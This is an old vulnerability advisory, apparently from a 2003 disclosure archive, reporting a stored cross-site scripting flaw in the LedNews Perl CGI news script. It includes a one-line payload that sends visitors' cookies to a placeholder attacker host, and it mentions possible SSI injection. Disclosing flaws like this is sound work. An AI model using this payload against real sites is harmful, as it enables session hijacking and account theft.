XSS Vulnerability in LedNews (CGI/Perl) v0.7

2003-06-21T00:00:00
ID SECURITYVULNS:DOC:4723
Type securityvulns
Reporter Securityvulns
Modified 2003-06-21T00:00:00

Description

XSS Vulnerability in LedNews (CGI/Perl) v0.7

URL: http://www.ledscripts.com/index.php?page=free:perl:lednews

Description

LedNews is a CGI application written entirely in perl. Its designed to be as simple as possible, but very powerful at the same thing.

Vulnerability

The script does not attempt to filter out javascript or any other HTML tags. So the posting message :

<script> document.location.replace('http://evil-haxor.com/cgi-bin/cookiemonster.cgi?'+document.cookie); </script>

as news will send cookies to your CGI script.

P.S.: It may also be possible to put SSI tags in news posts, since the script does not seem to do the usual filtering for them. I did not test this because i'm to lazy to install SSI on my system.

About me

I'm gilbert from Team UEC. I'm 16 years old. I dream about a job in security someday. This is my first time posting a vulnerability. I can always be contacted at gilbert_vilvoorde@hotmail.com

Thank you for reading this and have a nice day,

Gilbert


STOP MORE SPAM with the new MSN 8 and get 2 months FREE* http://join.msn.com/?page=features/junkmail